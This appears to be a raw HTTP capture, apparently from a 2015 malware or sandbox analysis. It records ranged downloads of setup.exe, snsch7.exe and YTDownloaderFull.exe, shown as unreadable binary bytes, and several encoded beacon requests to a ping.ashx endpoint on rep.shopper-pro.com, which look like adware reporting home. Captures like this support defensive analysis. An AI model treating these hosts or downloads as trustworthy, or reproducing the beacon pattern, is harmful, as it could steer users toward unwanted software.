y....\].s.....X*W.s.VK...7....r.o.S.....W ..@#.. Yo"..5R..3V=........y
.'.....\...3....o.<m.o......].^ $.....J.....{...F.\%C}.l"....cq....
..R....i.,....3.....d.. u.u.lq.=~p..K..z....M.....!..c...d.".y.e..V(..
.~GC..u.dzL.=.b.q...P:...0j...,...C{_..`. .q.<....w...%..F...X....]
.&.9.K..2.q.W.X......`.ts..|......v..N.36&....I...<[."...w....J:7q.
_.7..K..R.t.....?............[9I..?.'..|......A:[email protected]<<< skipped >>>

GET /web/gf/all/setup.exe HTTP/1.1

Range: bytes=8250000-8499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:44 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434634143"

Last-Modified: Thu, 18 Jun 2015 13:29:03 GMT

Cache-Control: max-age=763

Content-Length: 250000

Content-Range: bytes 8250000-8499999/10834868

Content-Type: application/x-msdownload

X-HW: 1434694598.dop017.am4.t,1434694604.cds037.am4.c

Content-Disposition: attachment; filename="setup.exe"
E .....m.Q.Z.a...K...=...4D.Ug.U.*}cG.W..B..`...Um.jzr.........._.,J4.
pN..'....o.I..I.g.).TE.t<[Lx.....!...n...U_.....I.d[...p....&.)F#..
5,].|.gz...Q?..Phw....Xc..w9.l.u........<M.......I..w........h....S
.v]a/F....|Z....M.Q.....2..).MM.^..6..t/p..<..0..d."..`$.?NQ->..
._.K,[email protected]@.....EEf:.KpVc.-O..3.......;..6..B.Y.#\]....q...S1...
...:'.Q .m...Jb.........0q...o`.'.~...f.2...A./.F../7#..(.`.....R6..|.
.P3..p0.'.. B.......5..~~iR..~..e....N..4..4'...T.h..xs..C).HV>..7R
|...gk.k...........e...p..C..*...>.....'~...n[)P.4#;.Am....9..j....
z..P.$....x=..} r.d......q.[.aAX5.3z....IOw/.....Xwc ..-%.z..->J..V
>V.O...0../.....|[email protected]?.#.n..e`N.
?.}.{..........v.LN......^..:.Bf/:h..z....m.\B.....N..W!;_|..........!
...!...!}.,,0..A..J.....e5..hl.%,..p./...=..4-.vw.J2b...C~V..c.%%...%.
y.=}v.X..B*>....>.....tMi.2...#Z....Nm6...m..m.3.(h...q57X...a3.
.m.*>.Z..H..4X...7..Q2.B.d.O..4P...a(...... .<.K...I...cq...}...
..:...$.i...f..........$f.Dz=qn~...Ke_.."...&....gwq.%>. ......o.J.
...< .L6....2. ...^.r..\.}.P......v..0?..Ar...{:..7......d..X..E...
..y.....L..c..y."..J.O&......B...%...F.>o...>....[........O...._
l..}...W..GE..k..?.M.K...Q5..v*.d4.q1.}..rj...U.tpw.3.zM.W...d....0.a.
I..d.....q..di..~X.0>x..~l}.J...z............".....r|.z ...E..(f_Gp
P.9%r.?8..yO9...d...J.M.iRa[=....c0.....J.,t .&........h...}K.c..q..^.
W...E:.8..-X....*AA...>;`*....I..........]..|...Dy......... S......
.H....B.(j....M..`.......R...!..w|.....AB.....S.b.]{.._..2M.U..~%`<<< skipped >>>

GET /web/gf/all/setup.exe HTTP/1.1

Range: bytes=8500000-8749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:44 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434634143"

Last-Modified: Thu, 18 Jun 2015 13:29:03 GMT

Cache-Control: max-age=763

Content-Length: 250000

Content-Range: bytes 8500000-8749999/10834868

Content-Type: application/x-msdownload

X-HW: 1434694598.dop017.am4.t,1434694604.cds037.am4.c

Content-Disposition: attachment; filename="setup.exe"
 ....6................e- .1.......q.....Hx...}.......{........'.G...w!
.*..........e...R....3...C(.{..|.c*.>#.i"....@..>.....v..tK,A..*
..k;.Zpu@.$..F%...~%.....$Y&s.#UR.e%.Q.v.{..X|.{)_...x]y...z..!.B.....
.~6^......i.O..BR...I\,..D.P.v99)........^0<...ne.>@...o..9...'P
.x>f__.....i.D..Zj(|.{..f/O....GE..|f.H............g..........v`.{0
rR3..../.......x.R...E~.FZD.n..t.Jj.......3...<...%^:2.........b)m.
q0.:..m>f.....ze.=....d..)6.*.$(..{..f._.#.R...2)K....XY..e....kZ}[
...LnumZ..s.)=..J.{`.[...-.?a. ......`.......<...x..../-..MUL......
.....K=........b.RT\....]......V..-F.t....#..[....K'.B,g.......s2Tk...
){.1..=.........z.ql....1\Pb_.....L].^.4...5.........[.i......j.Z.'h.w
...j.Cc....... .7.'........T:... ]..".....<....na......K....T.%..m.
......Q.U2c8.V%X...J...k.q......-{..M%...LC..^.'.R. ........yg.`....f.
..X....Z......&Y......<W..z....C...C..WK..g.*;4..VFK.{.t7..|B.E..~?
~..G?......?...... [.....I&.....u...~.]k.9z...s%."#........xDwK.l..M~;
hI.'.-..X.W....(hE..)h=$u/[.....0Q...i..=,... ..Ml..... ...$..,=..d...
..C.....?.M..-....g.Zj.....p......P..u...!N..%%._...G.`2.]..:.'.'..#.V
o..v(B.W.N.V...d.E....i%`.................J..T......ty;~.P..[$.M.#..!Q
K?._.C..R....>...C.[..........Ny..5..M.A[......s...U.{].r.f.a...!N.
>.BK&.$....`...b>Q......C.Uq..B.F.l..[..%.odQ.L._..?..0B..DzPG.E
.]....}.9/..GX.fd..k.....0...y.x.dT..(.gh...4#.K.....$V...M.......:...
eA..^......<....;.I.<K..U...[F...<..[O'.V.H... .M....Vz..bK..
.0=-7..QXw.."Q....."..7.K,&......O`@l>..J.W.I7?v.....q>...YO<<< skipped >>>

GET /spdbt/shoppy/snsch7.exe HTTP/1.1

Range: bytes=8750000-8999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:44 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434637776"

Last-Modified: Thu, 18 Jun 2015 14:29:36 GMT

Cache-Control: max-age=796

Content-Length: 250000

Content-Range: bytes 8750000-8999999/10182738

Content-Type: application/x-msdownload

X-HW: 1434694598.dop017.am4.t,1434694604.cds037.am4.c

Content-Disposition: attachment; filename="snsch7.exe"
o......S.vH#.&t..;..Jd....K.H..v.D.8.Q"....((....i...O...=....m.5.....
.WF..lq}...r...z.........gA..O.:OtDP.......<.....N...t&.8...,...j..
R...Xa..R.OD........X...ZL..b..6m.C..)x5.l...;...ei.K..........FNh42..
H..pf.#7..L.=...[..xV<!...........`.....h1p....>.!.P.....2..../~
..J...mp...m..K...p........;.~F.$.'......{.8..y.,.<x......Q.u_...32
........%..x..=..^B ...R.mn..d7v....! _..q...hT..,.#..)2...z...w.n....
S.Rf.....b......Nh...9q4....'...F,-...x.................N.9\.K....t...
t.*[email protected].`*..o42...-.h.3...Tm..U..u.X.......7>.ju<
;..N..4.$g..b.......yxH...:?p........k0.k.8.....$9c...1Zoz2...0......v
.w......."...n.....U.Ag..........4.}....h..:...TC.7..G.\ZD..15)...R...
...w^.&....5.m.....o.7......P...a..`.....rLG......A.... ...oS.r....,.{
s.....,...e.m.. &7.M0.u/...|.U..e....`{4#..`.>.4.]*..>u......(4.
Z.cW.,b.B*..G8.Z*.......4).6..Y.-#D[X...........;..R...$.....-.>..G
.........&D!m.....fu.$....CIM..Q...z..P.>.....:Y..dL........On.MV.n
7.j....YK..C....:.......l...g.b..?.<.?...........$.-&0OB.Z...6w3.v?
..&P-....Q...U....a.... i&.. J.'[email protected]..........!w..7.1..Ay....F5...
...n.....[A...........)).d....H.k.5.H.^..N.k.....WJ..........h....#C.m
#... .............4h".[7.........(...-O..Um.$.2.D...*..p..U/.9...>.
H.r...g.H...R..j...A.......JENJ.*T/2P...x4..s.l.....h=0.YH..(.:......G
d.. "....5...........L.o.:a........6...E.P..y......g..".....0....y>
u..wo...].b......}L..Mk......u.".OC...Y8...i.=p.........Q..>.5....#
.vw&...S..7.......`C.r.......:.oqo...._..t%A)=..(.r..u!Hz........7<<< skipped >>>

GET /web/gf/all/setup.exe HTTP/1.1

Range: bytes=9000000-9249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:44 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434634143"

Last-Modified: Thu, 18 Jun 2015 13:29:03 GMT

Cache-Control: max-age=763

Content-Length: 250000

Content-Range: bytes 9000000-9249999/10834868

Content-Type: application/x-msdownload

X-HW: 1434694598.dop017.am4.t,1434694604.cds037.am4.c

Content-Disposition: attachment; filename="setup.exe"
....?....B..=,..k...8...^j?{.x..pC..p...ct.j;.....9U..`...>9...I...
._.t..Q("...K...3..V}.<T.7.dqI.y#:(s........B]..l.9L.._.o..."W....^
.#q&.!9.....A@... ..g.TF1.l..l..[..^D..7..7..P..\.....t.......i.^h..3.
 ..@i'. j...Y.=.1.}I[YM...H...R.<ik%u....H.9...8.>...AJ......O..
)d&...$..f..#@.TOP.:h...V/.......gT. ..4,x.C..,..5.h.A..7..9.*g_K..d..
..zN.1;ld. ....e..Fp.J.b........v.'p...;.......;..'~w.s.o..,..S...t...
....J..0{.g..W.....J][email protected] ;...n.......b.....1j.c......l........A
g.\...>....4b..`r...E..T....._..lV.4k.{..M.E...R$>....<.....t
@...."".H..4.e....>eX...2}p>..........:..|GD!...)[email protected].
..^[email protected]=.e.._.o'F.....j.F7...
.Yi.Q....=!".v..B..mQ.A`....{S.9..S?H.7.7.>.<..ZF..ub.G.W..I...v
..L...]......qe..).....'C.p....E..]. .....PMl...?W...SXJ5....@J.......
......}B....2?.D..D....f.8>..^..U.....l..................P..K.*!".K
..!...K_...w......3rm...W?.p.......K'.....P(.zF...jS...C.zF.....#..\.A
RV.. sh8.j"N.j.}.....F..k6 ..[.3..aM.....2.SR...B.._gF.qtA....:...H...
.M..p.U.g.T>...S ..........v....D.B....O/.....b."Z..e.....9f@uMh,..
..........U`[...%.'G.......j8...Lc1...b.wj........T..ul.<..gg.,...1
....*V.|m..........@*.......MjvM.[A...a.,(.r.....M...S....M.....W....W
.W.'.....<..T...z....@].B.|.!..0........N.}...........~...].....u..
...D.......:..'.....:(.V1L.[..v..Y..3eK#....2Z.&....5G..;P.M.. 7.. ...
....uf.....`K#.W...."..........T.B.U..B.....Mib ./.. ..dnC......3H....
p{.Or'.NB.R.c..?....k|..).1._...?&U.lZ7...pp..*~...R.:..m.p....]..<<< skipped >>>

GET /spdbt/shoppy/snsch7.exe HTTP/1.1

Range: bytes=9250000-9499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:44 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434637776"

Last-Modified: Thu, 18 Jun 2015 14:29:36 GMT

Cache-Control: max-age=796

Content-Length: 250000

Content-Range: bytes 9250000-9499999/10182738

Content-Type: application/x-msdownload

X-HW: 1434694598.dop017.am4.t,1434694604.cds037.am4.c

Content-Disposition: attachment; filename="snsch7.exe"
.....E.Y.Q.....YV.{.1..=.U.?.E=>s.....m..J..#..]J..........YL.....C
.WT......).53....../...Wx.n.....#:.e.........L....kPy.#..F....1....C.X
."..L..^......T.|...|..%l.......Q..N.y.]..r=.T..g....*T.9....Ug.x.Sy.P
.U.....t .n..0l.....1.K.....7..S......g.".*.8...{N...t.....^.Z}...E0..
MU....Ii`[email protected]...>.z.,.J.(8....(../M6...;|......wA..iq....c...@
..$.P8....>. .....K....G9......([email protected] ....."3........{A6'
g...I(6<.......\...4.#j.[qy$,Z7>.O&66L....Z.8...gK...._.o.G..(..
..V....g.2.........g.(.......#a-...`.F..}............ZLk...p.3..[p.t?.
.)....~T..^..!k.1..2V}.%h'.u....q.t&..B........%..e.E3.~..Y.Q..d../.q/
(...Yg........u.Xg....I.....F.H(,[email protected].#./....s..Qq
pd........Qii~....&....d..|...{......f...O..n.L.k.....l"..D........../
].-[.O`ma...l._...e4..fX..i.).Mm..1.en.......M"..w.S\.....V.....C:...D
..'Og.^..Zx.....jX...,u.[v._....X..3oO..i8b..fk..td.K@4;y....0...~....
; {u.6.k.?.............H.9f\..f<6b...1m...p...01Y..... o....D.&.&v.
..Ca4...&,~...S4...._.......\6-...;....../..!....k..[R..b.Et3..h3.....
g........t_.A.z1(..e/.}ZA..g.u1C.......^......o!.q..3.n.....~y7j...4.L
.......fw.9;.x(f.xeyYK...w.n$D.....H.b....=.C...w.D*...UL........MS...
.o.I.Dz.k.%.........3........u..!!f[....d%...sP......`...YFmT.......r.
V.T....$...`.....:@n..M.Q...e.t1.1..W.&...z .b...9..7t.c.r......I.$.(.
Q .Q...1.N..u......H.zb.aPH..#..K...........z^..N..&......P iq..".xCg.
dG.a......u.2.y..E.g..5..~..i..N..#.u..%.9..9....H ...v.-...........e.
N...2....!f.../.].4,...*...T.-i.U..T....uu...W_........;#.j..h.(..<<< skipped >>>

GET /spdbt/shoppy/snsch7.exe HTTP/1.1

Range: bytes=9500000-9749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:45 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434637776"

Last-Modified: Thu, 18 Jun 2015 14:29:36 GMT

Cache-Control: max-age=795

Content-Length: 250000

Content-Range: bytes 9500000-9749999/10182738

Content-Type: application/x-msdownload

X-HW: 1434694598.dop017.am4.t,1434694605.cds037.am4.c

Content-Disposition: attachment; filename="snsch7.exe"
,....;............'.......:...e.a}&..I..Y][email protected]>..gr~..""/.
..1Q.G...y.{2..p.....m7S......L....d&..`.E.B....... ..&{.......*g.4...
../..2..Z..oor..0...%.}b..(.].r0&>..x..-...$......x......... .`..Ze
._.......8~Pp.N........\.........O9a...m.UM4.X.....".<ta..u.["?.*..
^:y..L.P(?.\...pB..6/.L.....]tp...-.........r"@`..$.l........D..2...:.
.IY.;Y...Mk..............e..t=.M(..x..6^b..l.W1..!.i,.k.......h9{..7?.
.l....|[email protected][email protected]. ..q..e...~....X...:
u.$....a..q. :[email protected]...$=...&.0........83b.\{..U..o.c
.H.2.T4. F{.]~Z:k>h..5.L[..n...7.Hx...k.$./.[..r.#%.....g.x..O^.s..
K&kae..G.?.9!\]. F~%>..4.kr"Vn....(.........-.....F..o.g.Zv...|....
..[</ ?.n.O..M...M.A.....L.q=......lT.mS7k.eY..'i.)B.0..X..|$o(...I
..7\ibrZ...Z....._..g....K..JC..3S>c....so'E.!.]Z.Be...........t.[.
k.....d..2/..8Vh.....yDU)....r..F...L.o....q...........g...M.V...3...6
......^.........q.#.h....o.................].....................ac.p%
Kd.}.BL./.h...P_!.T.%.8.c.Y...Z..........H......G............od..Cy<
;.}.-^.......5Q.U........7...N..X.E.........N*nP..(."I.5Y..0N.6.....(v
.QFn<...F.M\..........p\.1....0....3xc}..i).z.K.xI0. ..n...G7.....&
gt;......;.[.@..).Ra...".ya.f...L-...}.f.f...M....p.f................&
gt;;K..[.E.?..#..S.Pk........r.St.....Y.....o*..."... .ZL....~...S[.N.
.K]2.......N.P.7....V.....).........n..A....e..t.v..?."..B.>VV,..Om
..v......C.y......[p\..4..w..9gr7........*C..k~.s^....g.C.J&...`F..;Y.
*./....^..9..{q..x ..`..q.<.a...<...DBUY).I....!|..%....Z^..<<< skipped >>>

GET /spdbt/shoppy/snsch7.exe HTTP/1.1

Range: bytes=9750000-9999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:45 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434637776"

Last-Modified: Thu, 18 Jun 2015 14:29:36 GMT

Cache-Control: max-age=795

Content-Length: 250000

Content-Range: bytes 9750000-9999999/10182738

Content-Type: application/x-msdownload

X-HW: 1434694598.dop017.am4.t,1434694605.cds037.am4.c

Content-Disposition: attachment; filename="snsch7.exe"
Hj.~.z.....1F.hg5"..{.#.).p...N../..i7.....Y...N..[aZ......z.....C..._
 ...../....<.(..p.*U...b..=. _....B~.7>..a.R..H.....Z....a3.5.Y.
;.!.3........z...k..t.x.6...D}.!.,...-.O._.V..kdN]...=.d.=....<....
gehL.Y{...%9.!.ZN.!..Ma......p..}"..q....s2.\ .../.D../......;.A......
.....K.....4... G:.%O...N?.z......@%...9s...?j.8.Q.3..;...DH....X....E
HP.-N#8S..:...x^.L.P..{[email protected].)6..Fg.E.........)./.l..eJ8>.F9j.
...s.Kr...F...#m......*B....H.<.........._:..WP.fD..|A2.p...Z6....f
.c.....J3..j|.(7....s...E...4.....<...~1A..j.<.....K2.*d........
C>.1.4..R.G*....u.o..x.......8. K.yx/.u....o........2.N.Fk....^..G.
......0..... uS.....,...0.............y`FV........w...`.>K.."J.,C.G
.Q...m .f...M}[email protected].....'T..#G...2Af.E5.d.Hv../ ..uR.b I...... .g.
c.s./.W.~o.3._.u.V;.....IJ..q..7..`..#....=,_.v]\....32T...u.t.o.&/N..
J..]_.=zSe..PC.E."...-d.k.....JFx.t..o...........%........LrZt._...t.j
d...t.....,.....,.8...*.)[email protected]  u.(o..{
M./.G;..6rg................v..../FD...f.I.........G.......q..!...m.qhS
...l..%...R)5q..~... ..p.H>..uG.L....`.._.....^IS.O....1~{..8qL>
P.-H..yFU.:..6!r..(..>..&H$..\n.rR.M.....W...<x........P.G7.n...
[email protected]&...h..(.`vp..>..C.p..|......s.../V...... w......c..
.=X.%.?...PJ.....A.....H..${...fgh.Je..sT.g:..x.iI...g....F...7N.1!V`.
\......Q:.e..z.g..(@dma.._.8...Y.H%..=H.X*.4..G.....im.......f.p..l.f.
y,7....0c.....C.W.G...Ru........Y...?....|....%.}(...C..@;.F....(.*.UM
..0g`o.fH....>M..X.m........1...k... ..bt.<`*.Y.......<\.<<< skipped >>>

GET /web/gf/all/setup.exe HTTP/1.1

Range: bytes=10500000-10749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:45 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434634143"

Last-Modified: Thu, 18 Jun 2015 13:29:03 GMT

Cache-Control: max-age=762

Content-Length: 250000

Content-Range: bytes 10500000-10749999/10834868

Content-Type: application/x-msdownload

X-HW: 1434694598.dop017.am4.t,1434694605.cds037.am4.c

Content-Disposition: attachment; filename="setup.exe"
.k.\\. e.7o..[..S..J.O0S..SS...2.......m....9.PR...BpE4.{........._...
.C..?z...{.u.K.. .e5T/.B.p...... >q.... >ly.......lD.....7....).
Ce.?.b.:..!......ft8,1.?.E.>..v.."...a.F^Z..3YL.x1.n.&H.~w..{v.]s..
R....m.....8..?..=3.........$..[%..8.....q.(.Z:)F..l...}_.m.TF.O..e..a
]....f..g\.......x.....^..{...r......T.5!H.?.d.G.a.<po. .0,.5..z.7I
..Y<o3I{.6.D.".......h.nT.IX..X......\Z...J.J..n..XW....d.......@..
p..vs.Z.R.R"....D.'.....{#l..SM.#....J...me..TI.......{.K-%-."2...Z..c
...v`....#D.7ER.:S.......4j\X~....j..x.pG.~.M..pd..!....r.'-..O.nS~.&g
t;..W...0..%.A......H...|........tM...)R.S.]..t./*.....]..x.*..^=.;.7.
I...\'......a.O`A.f!...U......a.(.....e.5.x...w..!.n1B{..J....[@...m..
o... ..M..n..&.........e..;.l....{.(5...^L$...$.IJ......5..K......e...
..4.....[/[email protected]$K.....L.......K.....~.)................
[email protected]...'.R..Q....>.k..W..O.#.68......u..vWJ....SQ.C...{
.0..th..V... Tx......q#[email protected].<
K..[&.e.#...Xt..:<..........N.S.......v....../.....5.wI..2nl..!..'.
....Ql......M.N.!...}Op.y..(z...bN....y duE..S6.CS..[l...6i.u..s....U.
.<.{..S..6...=.skw.>~y.,5...iZ..g.&..:..q..K.|......5...C\.6K...
.Z...N.....;..K.....T(a..B............. .9....F.*.u..O..wx...<...R.
.q...M........../..P(......h<<o6g...xfF..0...].4...;....... ?.z_
.....1XO9c..7....i.S.#\.D:K".u.(....R..$#oO....-h$..E...K0....3....)..
..J.q3......~.f.2xp5.22.C.....R.!.n.0S.a.9[:....C..`...d..|.{.u.Q_.p.l
J...... .a.....1.E.B. ....A.....U.'e....?..}....{...>bAY.a4....<<< skipped >>>

GET /app/ping.ashx?e=xQ3AxlCgdr chLpJKTn3oGAiHkI4CCT/TEgCpOx0T0GQL2F0hg1RiYQofSWvfvXx6Iyuuc4O24edLIaqTW0yuG M wGfCAoYWS3u52WlK7MdRS7ocO43fkEXlTeNLX sfKwlC2TeCg7lnoGCEF1IIyQxWeZ2hMdUZrdGZ5CXclVTvMZjEVVmTm 4 SQMoieQ8Lxp8HLogowR591rTzu05PNsA1iuxLaBHdtdgGHkZrI4k4Gm5vvSsl KqrDcjAVy4So4N0DyvUVt9bTy0e1BneUS4717SFgKd6j7/wRBDsRoqvWX6JwkejqMehRdfaX6iZYn8TH3Pe3MlW9RFqOniqVRDsrPlqwdmkLLb35jLfrVLutmednZNQ== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: rep.shopper-pro.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Cache-Control: private

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Fri, 19 Jun 2015 06:16:45 GMT

Content-Length: 0

....

GET /app/ping.ashx?e=xY8ohDYpM jBrZeNeEaMqQXvthyJPaJKJNfQDIfHDSP7RH4w/5EvdQk4teRL0v Hqa3a1O2i2Y5BhrP9twY3lD0xAWuIK9PHTosBFn3BGz5AkUNxy9zsS58Pk9jtfSr7GKzY45zi1OnWyB8eDAkaihrzHkXTPDbIohI/ JnYfdrw1VxvH51bFJF4kQIHXTAmjFaC1iN6TTGCGrpHNYuwVrBRuaRLHbXnHiPVU04Syd0l8Zmq62SwZqBrT6GuQ9YjnJxdvdBmPx4igRpi97/ACb6vs2JJATJ04VTmYx8DZjA8oxErH8fL5pgPXGLp3QYEb98NyY 3Jv/oKdNf4wHzMG0hjZa1YiVe HfvMJQtwAmNTS2oycWuMQ== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: rep.shopper-pro.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Cache-Control: private

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Fri, 19 Jun 2015 06:16:45 GMT

Content-Length: 0

HTTP/1.1 200 OK..Cache-Control: private..Server: Microsoft-IIS/7.5..X-
AspNet-Version: 4.0.30319..X-Powered-By: ASP.NET..Date: Fri, 19 Jun 20
15 06:16:45 GMT..Content-Length: 0......

GET /app/ping.ashx?e=Qoli4LW15guchLpJKTn3oGN8A8ah1bHeTEgCpOx0T0GQL2F0hg1RiYQofSWvfvXx6Iyuuc4O24edLIaqTW0yuG M wGfCAoYWS3u52WlK7NV9oK7vZm95VRGW796HUe3a50u3XyigpUpkYBnI7MsgSpeLmibBFk9a5OEmrbJtlEklpIg/vGiFhQGw7w7bWmjz7d9KaLD84/d0InrHGn4CSSNrM4iVH1I2Ld2YP2inphlUrzhzYzRp/TJdQlmzM6hhiCSq9WqTw419dTrOWlVWolUJLAVEiQGRvaTpGfz3xhcJKC1Reo3n9s2Fs g80z0k6Cr9laSF2XrRbZnBny0uhv3iEz1ZNnAYhSLf3gsJzhYWVjeFKSrgJwIYPupgb31 HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: rep.shopper-pro.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Cache-Control: private

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Fri, 19 Jun 2015 06:16:46 GMT

Content-Length: 0

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=0-249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: ewp96u3qp-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:40 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: bx/RW7Qt434N4qeFZy/k7rH1hyDkcShBuxBcNMSqMiXYuS6YDdP0lRYcCS38sQph

x-amz-request-id: 5FA081A89C951E62

Last-Modified: Thu, 18 Jun 2015 10:00:13 GMT

ETag: "898ada50d75f82eed316dff5a1e4bd88"

Accept-Ranges: bytes

Content-Range: bytes 0-249999/7202358

Server: NetDNA-cache/2.2

X-Cache: MISS
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..i
u..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L.....
oS.................\...........2.......p....@.........................
.................................................s....................
...................................................................p..
.............................text....[.......\.................. ..`.r
data.......p.......`..............@[email protected]..........
[email protected][email protected]
..............@..@....................................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
[email protected]@..e...E..E.P.u....r@
..}[email protected]... M.......M....3.....FQ.....NU..M.....
.....VT..U.....FP..E...............E.P.M...Tp@[email protected]
....E..9}[email protected].}.j.W.E......E.......@[email protected]..
[email protected]<[email protected] [email protected]...\r@._
^3.[.....L$...7B...Si.....VW.T.....tO.q.3.;5.7B.sB..i......D.......t.G
.....t...O..t .....u...3....3...F.....;5.7B.r._^[...U..QQ.U.SV..i.<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=500000-749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: ewp96u3qp-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:42 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: ExSr6Ia2g86hRIsPePsrxtD sSvPq2BScWHkw2/qXiTO0VdprOgC2VRg8wHgFAoG

x-amz-request-id: 53CC7C4B9F296CF1

Last-Modified: Thu, 18 Jun 2015 10:00:13 GMT

ETag: "898ada50d75f82eed316dff5a1e4bd88"

Server: NetDNA-cache/2.2

X-Cache: MISS

Content-Range: bytes 500000-749999/7202358
.R....c....a.T....!.1..\.....%...?..o.#hL..KU.........]..z\....LK..R??
..grk...Y?.DP.c.'V........>...q6........B...H...K.y)....a...z...`..
....R..X.t...........G...:.....x....i...."..g<b[.#b.z"........<g
%.!..0...."..&]E.*...U....{x..R.......Yz......:....{.K.{.~p..Lx..ZS...
...d..$...EwE>\.$a.......>E^.r....a.T]..K..($d.|e......e.X......
...c. ......l.}C.#..$....P.W.P... .P..,K..dQ5{FF..9e.....Q..*).i*...=.
.....|.(1.8...&.........^....OHk'..{....5.(.A.b...G.....bNb...r.J`....
..z9.H 7..y...S*.>r......QG...#.....A......N.y.N8......\.j&-...:.?v
\@..4-(w."....E|.P..S..!.i...s..u..S.Kx...u..^...D}.0.1.v.......bPd...
:O..N....vWu.Fh......S.o..x$V. Q.....b............w.I....F..A.....D ..
.*d.n.......>...W3W..x..w...,.a......OP=.T..:.q6.T...ZjZ.....0u.&^.
.t.......;.K#...>..xr.D.s.E.bPUl..I.....ud8EYP& ].p-...-....a<.f
.Hn..C.".P0. er.J.):QL....G.Z...!..4&....?~.4.T........x.Lf"....E{..WV
v.....L.*......Q....?..?.G....Q.......q.X.%..<F...fn..Z...2-*.8[`Ln
.).}Z.gX?.>X.....^.\k..vsXI....wt....I*.5....o>.Z....F..]....h..
..I!.b.m./B...J.u.O..."1....S..9..`V^.H..Y.b..3I>.(.R._6Q...|......
..V...U.[..rP...<.a..S......b....=..B.1.>...C....{4...r.b.Z) @.l
.....1*2.....U......$:..\.*.......v.e..5.`c....=.>....57.{V"[...f\.
s.).X........@.%.9...........xohr.8.Yq.e...4.:V........>w.NCRp. ...
.rSf..c.iJg.8}y..ya.b.6.R<..>=...C...du..kjEb(...W.V....>{#..
.......;-.[.?E...)=.[.EC.=.g..(....g_.W.;.].K^. S.......Yr....b.Y.'..)
.*I.G.|.....2....F..... ".9l.......iji..M0|..`....'.C...@....|gf&l<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=1000000-1249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: ewp96u3qp-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:45 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: ExSr6Ia2g86hRIsPePsrxtD sSvPq2BScWHkw2/qXiTO0VdprOgC2VRg8wHgFAoG

x-amz-request-id: 53CC7C4B9F296CF1

